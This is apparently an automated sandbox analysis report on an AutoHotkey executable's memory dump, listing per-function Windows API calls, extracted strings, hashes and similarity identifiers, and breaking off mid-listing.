Instruction Fuzzy Hash: 84326A72705B408AFB36DB7795143ED23A1BB8DBD8F140121EF1A67AA8EF38C5458740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000F2E0, Relevance: 58.4, APIs: 26, Strings: 7, Instructions: 607threadkeyboardlibraryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 000000014000F390
CreateMutexW.KERNEL32 ref: 000000014000F3A1
GetLastError.KERNEL32 ref: 000000014000F3AA
CloseHandle.KERNEL32 ref: 000000014000F3C8
GetWindowThreadProcessId.USER32 ref: 000000014000F458
AttachThreadInput.USER32 ref: 000000014000F493
GetKeyboardLayout.USER32 ref: 000000014000F5CD

Part of subcall function 00000001400A9358: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A9384

GetTickCount.KERNEL32 ref: 000000014000F4B3
GetCurrentThreadId.KERNEL32 ref: 000000014000F4E9
GetAsyncKeyState.USER32 ref: 000000014000F527
GetAsyncKeyState.USER32 ref: 000000014000F537
GetForegroundWindow.USER32 ref: 000000014000F59F
GetWindowThreadProcessId.USER32 ref: 000000014000F5AF
GetTickCount.KERNEL32 ref: 000000014000F61A
GetModuleHandleW.KERNEL32 ref: 000000014000F7B7
GetProcAddress.KERNEL32 ref: 000000014000F7C7
GetTickCount.KERNEL32 ref: 000000014000F842
PeekMessageW.USER32 ref: 000000014000F86D
GetTickCount.KERNEL32 ref: 000000014000F894

Strings

^+!#{}, xrefs: 000000014000F8B1
MZ@, xrefs: 000000014000F8D6
user32, xrefs: 000000014000F7B0, 0000000140010700
{Click, xrefs: 000000014000F3E4
BlockInput, xrefs: 000000014000F7C0, 0000000140010710
AHK Keybd, xrefs: 000000014000F396
{Blind}, xrefs: 000000014000F332

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountThreadTick$HandleWindow$AsyncCloseProcessState$AddressAttachCreateCurrentErrorForegroundInputKeyboardLastLayoutMessageModuleMutexPeekProc_invalid_parameter_noinfo
String ID: AHK Keybd$BlockInput$MZ@$^+!#{}$user32${Blind}${Click
API String ID: 2830014824-1839110423
Opcode ID: 89364f871534d9de5765a3895343cbc526a7563b6f8ef967bc05b754334ada43
Instruction ID: acbd38619320472efa090a05506fdefc559966d14e8f675a5f8acae403373134
Opcode Fuzzy Hash: 89364f871534d9de5765a3895343cbc526a7563b6f8ef967bc05b754334ada43
Instruction Fuzzy Hash: E75201B12046908AF727DF27E8503EA37A1A74D798F44811AF7964BAF1DBBDC444EB10

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005E580, Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 000000014005E5A8
GetSystemMetrics.USER32 ref: 000000014005E5B6
GetSystemMetrics.USER32 ref: 000000014005E5C5
SystemParametersInfoW.USER32 ref: 000000014005E5DC
IsWindow.USER32 ref: 000000014005E616
DestroyWindow.USER32 ref: 000000014005E627
CreateWindowExW.USER32 ref: 000000014005E67D
GetClientRect.USER32 ref: 000000014005E695
CreateWindowExW.USER32 ref: 000000014005E702
CreateDCW.GDI32 ref: 000000014005E72D
EnumFontFamiliesExW.GDI32 ref: 000000014005E791
GetStockObject.GDI32 ref: 000000014005E7CC
SelectObject.GDI32 ref: 000000014005E7D8
GetTextFaceW.GDI32 ref: 000000014005E7EE
GetDeviceCaps.GDI32 ref: 000000014005E7FC
DeleteDC.GDI32 ref: 000000014005E807
CreateFontW.GDI32 ref: 000000014005E871
IsDlgButtonChecked.USER32 ref: 000000014005E88E
ShowWindow.USER32 ref: 000000014005E8A0

Strings

AutoHotkey2, xrefs: 000000014005E634
DISPLAY, xrefs: 000000014005E71E
static, xrefs: 000000014005E6EB
Segoe UI, xrefs: 000000014005E733

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$CreateSystem$Metrics$FontObject$ButtonCapsCheckedClientDeleteDestroyDeviceEnumFaceFamiliesInfoParametersRectSelectShowStockText
String ID: AutoHotkey2$DISPLAY$Segoe UI$static
API String ID: 1018824971-4085670783
Opcode ID: 9f0444f16d69fe4c83139f35306d4350fff10ba374ea6ce7a18a7e2f8d8f315e
Instruction ID: e1b9f45801e3b1b59fe678d5adf9e700dc20d82d00dd8f8172f153c9933aedf8
Opcode Fuzzy Hash: 9f0444f16d69fe4c83139f35306d4350fff10ba374ea6ce7a18a7e2f8d8f315e
Instruction Fuzzy Hash: D2915E762087808AE766CF66E8907DAB7A5F78CB94F544119EB8A43B78DF3CD544CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003C220, Relevance: 39.2, APIs: 12, Strings: 10, Instructions: 653COMMON

Download Yara Rule

Strings

V, xrefs: 000000014003C67E
sc%03X, xrefs: 000000014003CC28
NewInput, xrefs: 000000014003CAF9
MZ@, xrefs: 000000014003C27D, 000000014003CC45
Out of memory., xrefs: 000000014003C7F8, 000000014003C884
vk%02X, xrefs: 000000014003CC9F
V, xrefs: 000000014003C4A9
Timeout, xrefs: 000000014003CD0F
Max, xrefs: 000000014003CB05
Match, xrefs: 000000014003CD06

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: MZ@$Match$Max$NewInput$Out of memory.$Timeout$V$V$sc%03X$vk%02X
API String ID: 0-301772239
Opcode ID: 51661bb2cf983b565cfd099b713ffa3f709133dbbddd0663a07c2ea1ef1524b9
Instruction ID: 9294c36655d55c85db19cf4f4df24185f3301bb979eacf667d95e29a135f9b8a
Opcode Fuzzy Hash: 51661bb2cf983b565cfd099b713ffa3f709133dbbddd0663a07c2ea1ef1524b9
Instruction Fuzzy Hash: 2362BEB521069086EB27DB27E8507EA37A0FB4CBD4F489216FB9987AF5DB38C554D300

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003A300, Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

IsWindow.USER32 ref: 000000014003A39A
DestroyWindow.USER32 ref: 000000014003A3A7
GetSystemMetrics.USER32 ref: 000000014003A3CE
GetSystemMetrics.USER32 ref: 000000014003A3E0
GetSystemMetrics.USER32 ref: 000000014003A3F1
GetSystemMetrics.USER32 ref: 000000014003A3FF
GetDesktopWindow.USER32 ref: 000000014003A40D
GetWindowRect.USER32 ref: 000000014003A41A
GetCursorPos.USER32 ref: 000000014003A442
IsWindow.USER32 ref: 000000014003A50A
CreateWindowExW.USER32 ref: 000000014003A55F
IsDlgButtonChecked.USER32 ref: 000000014003A57E
GetSystemMetrics.USER32 ref: 000000014003A586
IsDlgButtonChecked.USER32 ref: 000000014003A59A
IsDlgButtonChecked.USER32 ref: 000000014003A5BB
IsDlgButtonChecked.USER32 ref: 000000014003A5D3
IsDlgButtonChecked.USER32 ref: 000000014003A5E8
GetWindowRect.USER32 ref: 000000014003A5FD
IsDlgButtonChecked.USER32 ref: 000000014003A697
IsDlgButtonChecked.USER32 ref: 000000014003A6AF

Strings

Max window number is 20., xrefs: 000000014003A35E
tooltips_class32, xrefs: 000000014003A51A

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ButtonCheckedWindow$MetricsSystem$Rect$CreateCursorDesktopDestroy
String ID: Max window number is 20.$tooltips_class32
API String ID: 3110449058-1788364857
Opcode ID: 0b27ccaacbd8314323a05e7d977841d00f298fc040cb20789018843a15d2c003
Instruction ID: 0bb79d1198011170268ab7923c7ccd8400702616552b94f7f44d5e6b3ff0565f
Opcode Fuzzy Hash: 0b27ccaacbd8314323a05e7d977841d00f298fc040cb20789018843a15d2c003
Instruction Fuzzy Hash: 8EC18A72A14B108AF766CFA6E4447ED33B1F74D788F404129EF0A97BA8DB78854AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140008140, Relevance: 37.5, APIs: 19, Strings: 2, Instructions: 770COMMON

Download Yara Rule

Strings

MZ@, xrefs: 0000000140008298
-()[]{}:;'"/\,.?! , xrefs: 00000001400086D3

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: -()[]{}:;'"/\,.?! $MZ@
API String ID: 0-3444663223
Opcode ID: 09fffdba6a8195919f83af6eb2167eaba5e483564d951849533ecf47c76682cb
Instruction ID: c29f562d7cab5bea44b72935ca9f29763466ead6333c1e0db54066da93b5165a
Opcode Fuzzy Hash: 09fffdba6a8195919f83af6eb2167eaba5e483564d951849533ecf47c76682cb
Instruction Fuzzy Hash: DC729CB2604A9086FB77CB27A8443EA3BA1B79DBC4F055116EFC947AB5DB39C545C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400222C0, Relevance: 32.0, Strings: 25, Instructions: 714COMMON

Download Yara Rule

Strings

Duplicate declaration., xrefs: 0000000140022384
this, xrefs: 0000000140022488, 00000001400224A9
%s.%s, xrefs: 0000000140022327
Expected ":=", xrefs: 0000000140022B73
value, xrefs: 000000014002250E
Blank parameter, xrefs: 0000000140022BC4, 0000000140022C50
, =), xrefs: 00000001400227F3
Parameter default required., xrefs: 0000000140022BDC
Duplicate function definition., xrefs: 0000000140022407
Out of memory., xrefs: 0000000140022CA6
A label must not point to a function., xrefs: 0000000140022DB8
Missing ")", xrefs: 00000001400225B6, 0000000140022C0D
false, xrefs: 0000000140022835
Too many params., xrefs: 0000000140022C64
Parameters of hotkey functions must be optional., xrefs: 0000000140022DD7
Unsupported parameter default., xrefs: 0000000140022BA5
, :=*), xrefs: 0000000140022580, 000000014002264F
Missing comma, xrefs: 0000000140022B12
Invalid function declaration., xrefs: 0000000140022B5C
ByRef, xrefs: 0000000140022600
Missing close-quote, xrefs: 0000000140022B8A
Duplicate parameter., xrefs: 0000000140022C38
R, xrefs: 00000001400226BD
(, xrefs: 00000001400222F4
true, xrefs: 000000014002286F

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: _invalid_parameter_noinfo
String ID: %s.%s$($, :=*)$, =)$A label must not point to a function.$Blank parameter$ByRef$Duplicate declaration.$Duplicate function definition.$Duplicate parameter.$Expected ":="$Invalid function declaration.$Missing ")"$Missing close-quote$Missing comma$Out of memory.$Parameter default required.$Parameters of hotkey functions must be optional.$R$Too many params.$Unsupported parameter default.$false$this$true$value
API String ID: 3215553584-2075026647
Opcode ID: 71b11f6403d811842af6c798f4db65de7c4730dc3e6fd3f988c25116d7a3cabd
Instruction ID: 0dc6292de5f321403c9fa5b60876519b84b0a4cb37be433627c4d933fc7d4600
Opcode Fuzzy Hash: 71b11f6403d811842af6c798f4db65de7c4730dc3e6fd3f988c25116d7a3cabd
Instruction Fuzzy Hash: 0662BD32215680A5EB769F67D5103E963A0FB4DBC4F84491AFB49576F9EB38CD81C301

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004D080, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 349filewindowCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 000000014004D27D
GetTickCount.KERNEL32 ref: 000000014004D2A0
PeekMessageW.USER32 ref: 000000014004D2D2

Part of subcall function 0000000140035590: new.LIBCMT ref: 0000000140035613

Strings

MZ@, xrefs: 000000014004D3E6
%s\%s, xrefs: 000000014004D6A7
*.*, xrefs: 000000014004D5A5

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountFileFindFirstMessagePeekTick
String ID: %s\%s$*.*$MZ@
API String ID: 3229853114-565386798
Opcode ID: f996d88c252f17bc2606ea3e9563feefe87367f8167bde948f4f334a13cc471d
Instruction ID: 6df53c3f43b64ed8c40b2c8e2efa11f32cffb274d2805b93a791bccef2339406
Opcode Fuzzy Hash: f996d88c252f17bc2606ea3e9563feefe87367f8167bde948f4f334a13cc471d
Instruction Fuzzy Hash: 1BF1D072604A80A6EB629F26E4803E937A0F7987E8F514227FB6943AF4DF78C545C704

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000A2B0, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 182threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 000000014000A325
SetThreadPriority.KERNEL32 ref: 000000014000A343
PostThreadMessageW.USER32 ref: 000000014000A381
Sleep.KERNEL32 ref: 000000014000A38E
GetTickCount.KERNEL32 ref: 000000014000A39D
PeekMessageW.USER32 ref: 000000014000A3CA
GetExitCodeThread.KERNEL32 ref: 000000014000A42B
GetTickCount.KERNEL32 ref: 000000014000A43E
Sleep.KERNEL32 ref: 000000014000A450
CloseHandle.KERNEL32 ref: 000000014000A462
CreateMutexW.KERNEL32 ref: 000000014000A500
CloseHandle.KERNEL32 ref: 000000014000A51B
CreateMutexW.KERNEL32 ref: 000000014000A542
CloseHandle.KERNEL32 ref: 000000014000A55E

Strings

AHK Mouse, xrefs: 000000014000A537
Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function., xrefs: 000000014000A586
AHK Keybd, xrefs: 000000014000A4F5

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Thread$CloseCreateHandle$CountMessageMutexSleepTick$CodeExitPeekPostPriority
String ID: AHK Keybd$AHK Mouse$Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.
API String ID: 493082617-3816831916
Opcode ID: 652bb92e32a0b45b6425e00cc36f58ac267e81628fc7aefccf2d625100a53112
Instruction ID: 1dda319ab042cc8fe276c0726840e46ef81407420c50d3b69a113d93ab68688e
Opcode Fuzzy Hash: 652bb92e32a0b45b6425e00cc36f58ac267e81628fc7aefccf2d625100a53112
Instruction Fuzzy Hash: E98157B5205B4085FA67DB63B8557EA22E0BB8EBD8F440119BB8A43AB0DF7CC594D710

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400424B0, Relevance: 26.9, APIs: 11, Strings: 4, Instructions: 630windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 0000000140042682
CreateCompatibleDC.GDI32 ref: 00000001400426D8
CreateCompatibleBitmap.GDI32 ref: 00000001400426FE
SelectObject.GDI32 ref: 0000000140042718
BitBlt.GDI32 ref: 0000000140042766
ReleaseDC.USER32 ref: 0000000140042A5B
SelectObject.GDI32 ref: 0000000140042A81
DeleteDC.GDI32 ref: 0000000140042A8A
DeleteObject.GDI32 ref: 0000000140042A9D
GetPixel.GDI32 ref: 0000000140042CB5
ReleaseDC.USER32 ref: 0000000140042CD4

Strings

, xrefs: 0000000140042740
RGB, xrefs: 0000000140042511
Fast, xrefs: 00000001400424E5
0x%06X, xrefs: 00000001400428C7

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Object$CompatibleCreateDeleteReleaseSelect$BitmapPixel
String ID: $0x%06X$Fast$RGB
API String ID: 2743567915-452930595
Opcode ID: da6871d0fcf300cb9c70236895e8f8599affa2f6e80d488201a94ca78ff14123
Instruction ID: 37cbd059731a8065b7e5004384f0f1bee7bfcd2917f17e822fd089f37449f779
Opcode Fuzzy Hash: da6871d0fcf300cb9c70236895e8f8599affa2f6e80d488201a94ca78ff14123
Instruction Fuzzy Hash: 0942D3723087C08AEA329B26A4403EEAB91F78D7D4F854225BB9547AE9DB7CC445CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140053050, Relevance: 26.9, APIs: 2, Strings: 13, Instructions: 615clipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A6D70: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A6D97

IsClipboardFormatAvailable.USER32 ref: 00000001400538A8
IsClipboardFormatAvailable.USER32 ref: 00000001400538B5

Strings

ERCP, xrefs: 00000001400530D7
<<>>, xrefs: 00000001400538C4
PCRE, xrefs: 0000000140053119
Len%s, xrefs: 00000001400533DC
ERCP, xrefs: 000000014005309B
Len%d, xrefs: 000000014005358C
PCRE, xrefs: 00000001400530E0
PCRE, xrefs: 000000014005314D
ERCP, xrefs: 0000000140053144
Pos%s, xrefs: 0000000140053343
PCRE, xrefs: 00000001400530A4
ERCP, xrefs: 0000000140053110
Pos%d, xrefs: 00000001400534F6

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AvailableClipboardFormat$_invalid_parameter_noinfo
String ID: <<>>$ERCP$ERCP$ERCP$ERCP$Len%d$Len%s$PCRE$PCRE$PCRE$PCRE$Pos%d$Pos%s
API String ID: 318711952-3016860513
Opcode ID: ec4781e8f696eb4df6729d4c2a390a0344066508ea9c713ddaf9cbb092e2a1c9
Instruction ID: 2eb7b5f93d8255c0cb7789fdf95b27af49f17121731f30f114309c88ad2b4012
Opcode Fuzzy Hash: ec4781e8f696eb4df6729d4c2a390a0344066508ea9c713ddaf9cbb092e2a1c9
Instruction Fuzzy Hash: 2442C272600A848AEB6ACF26D8503ED37A0F748BD8F844215FB5D4BBE5DB39CA45C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005E330, Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 000000014005E3D8
IsIconic.USER32 ref: 000000014005E3E9
GetWindowRect.USER32 ref: 000000014005E3FF
CreateDCW.GDI32 ref: 000000014005E44F

Part of subcall function 00000001400424B0: GetDC.USER32 ref: 0000000140042682

Strings

RGB, xrefs: 000000014005E4CC
DISPLAY, xrefs: 000000014005E443
Alt, xrefs: 000000014005E425
Slow, xrefs: 000000014005E346
0x%06X, xrefs: 000000014005E508

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$CreateForegroundIconicRect
String ID: 0x%06X$Alt$DISPLAY$RGB$Slow
API String ID: 1835368863-780868468
Opcode ID: 786ede4802a019af72d208448336b852d3cb5044ded765fa6dbeb16d4659140c
Instruction ID: 5083e7fded4b61d8a6d95924422643667071c9793b8c57561d13a2000fb7d9b0
Opcode Fuzzy Hash: 786ede4802a019af72d208448336b852d3cb5044ded765fa6dbeb16d4659140c
Instruction Fuzzy Hash: DB519F32208B8082FB6ADB27A4507DA6790BB897E4F440215BFA907BF5EF7DC5458B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140059510, Relevance: 23.2, APIs: 6, Strings: 7, Instructions: 410COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32 ref: 00000001400598C5
IsDlgButtonChecked.USER32 ref: 0000000140059960

Part of subcall function 00000001400A9358: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A9384

IsDlgButtonChecked.USER32 ref: 00000001400599A9

Part of subcall function 00000001400A6D70: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A6D97

IsDlgButtonChecked.USER32 ref: 00000001400599DC
IsDlgButtonChecked.USER32 ref: 0000000140059ABC
IsDlgButtonChecked.USER32 ref: 0000000140059B27

Strings

Icon, xrefs: 0000000140059818
Check, xrefs: 000000014005977D
Vis, xrefs: 0000000140059846
Col, xrefs: 00000001400597D9
Focus, xrefs: 0000000140059732
Select, xrefs: 00000001400596DD
I, xrefs: 0000000140059589

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ButtonChecked$_invalid_parameter_noinfo
String ID: Check$Col$Focus$I$Icon$Select$Vis
API String ID: 1167183914-322541112
Opcode ID: eaed3126d2d78119f88ddcc0c18a29ebdfe19644d76a92d86d008aa2f5d9224a
Instruction ID: e96acd6f02400e9487429962b3ba41f1b4d865ff9001fc3d77fd87d685e828e3
Opcode Fuzzy Hash: eaed3126d2d78119f88ddcc0c18a29ebdfe19644d76a92d86d008aa2f5d9224a
Instruction Fuzzy Hash: 4902A03261469086FB66DF27E5403EA7BA4F78DBC8F544116FF4A47AA8DB3AC544CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014006C33D, Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 356COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32 ref: 000000014006C4A7
GetWindowLongW.USER32 ref: 000000014006C4BD
IsDlgButtonChecked.USER32 ref: 000000014006C4D7
IsDlgButtonChecked.USER32 ref: 000000014006C4EB
IsDlgButtonChecked.USER32 ref: 000000014006C51A

Part of subcall function 0000000140079D90: IsDlgButtonChecked.USER32 ref: 0000000140079DB7
Part of subcall function 0000000140079D90: GetWindowLongW.USER32 ref: 0000000140079DEF
Part of subcall function 0000000140079D90: IsWindowVisible.USER32 ref: 0000000140079E1C
Part of subcall function 0000000140079D90: IsIconic.USER32 ref: 0000000140079E2F
Part of subcall function 0000000140079D90: GetWindowRect.USER32 ref: 0000000140079E92
Part of subcall function 0000000140079D90: IsDlgButtonChecked.USER32 ref: 0000000140079EAB
Part of subcall function 0000000140079D90: GetWindowLongW.USER32 ref: 0000000140079F2F

Strings

0, xrefs: 000000014006C3A1
0, xrefs: 000000014006C594

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
